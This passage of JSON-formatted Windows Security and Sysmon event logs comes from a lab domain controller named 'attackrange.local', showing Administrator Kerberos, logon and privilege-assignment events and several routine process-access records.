to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{273840F7-1505-59F6-8A53-4282C2415AE5}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220505,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{273840F7-1505-59F6-8A53-4282C2415AE5}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{273840F7-1505-59F6-8A53-4282C2415AE5}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220506,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6F62E\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{273840F7-1505-59F6-8A53-4282C2415AE5}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6f62e","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{273840F7-1505-59F6-8A53-4282C2415AE5}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220507,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6F62E\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6f62e","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5026,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.709\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.709","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5027,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.709\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.709","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5028,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.709\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.709","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5029,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.709\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.709","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5030,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.709\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.709","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5031,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.709\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 